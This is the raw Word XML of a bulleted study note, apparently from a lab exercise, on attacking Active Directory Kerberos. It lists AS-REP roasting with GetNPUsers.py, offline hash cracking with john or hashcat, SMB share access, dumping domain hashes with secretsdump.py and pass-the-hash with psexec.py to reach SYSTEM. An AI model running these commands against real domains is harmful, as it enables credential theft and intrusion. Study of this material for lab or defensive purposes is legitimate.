    <w:p w14:paraId="76AD1D1A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Exploiting Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A426CFF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Following enumeration of user accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115C6AE6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>abuse feature within Kerberos via ASREPRoasting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217DC17D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>returns a hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70749A45" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>occurs when a user account has the privilege “Does not require Pre-Authentication” set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444F3C4E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>no TGT required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC96443" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1835B4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED132A6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Impacket tool GetNPUsers.py (Impacket/Examples/GetNPUsers.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A90F8AD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>allows ASReproastable accounts from the Key Distribution Center</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A0CDAE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>only thing needed is a valid set of usernames, enumerated via Kerbrute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FF54F8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>GetNPUsers.py &lt;domain.ext/user&gt; -no-pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6B6FE1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ex. GetNPUsers.py spookysec.local/svc-admin -no-pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AFF702" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>hash return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A3F39F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>copy and save to txt file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC60A2E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>john &lt;hash file&gt; --wordlist=&lt;password file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14816460" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>or hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F46C4D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Once username and password collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EB8D01" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>To determine what the account is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288D40B2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>psexec.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF7C4A1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>smbexec.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353F37C5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>wmiexec.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554B4DE4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>To try and gain access and determine privs and access levels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F80F0D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">try smbclient -L </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\\\&lt;ip&gt;\\</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> -u &lt;user&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B663CC9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C36EDC6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>enter password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024C7710" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Detect what shares this profile has access to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8041C8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>or if anything stands out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35686C80" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Try to connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021748FD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">smbclient </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\\\&lt;ip&gt;\\&lt;share</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> name&gt; -U &lt;username&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5257C742" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>run and enter password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C841569" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>“get” command noteworthy files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42360CE0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>secretsdump.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E98BBE7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>syntax – secretsdump.py &lt;domain/user:’password’&gt;@&lt;ip&gt; -just-dc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346D4E2E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>dumps out NTLM hashes and Kerberos keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605D1C91" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>DRSUAPI method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1DC90E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>dumps out stored user secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B70AE1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>pass the hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D29500C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>psexec.py (impacket)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F0D54C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>psexec.py &lt;username&gt;@&lt;ip&gt; -hashes &lt;hash&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76337E87" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3089EA8B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>nt authority\system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F7A6BF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C4B577" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Elevating Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D728C65" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>using newfound account credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E80C367" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD50F8C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Attacking Kerberos</w:t>
      </w:r>
    </w:p>
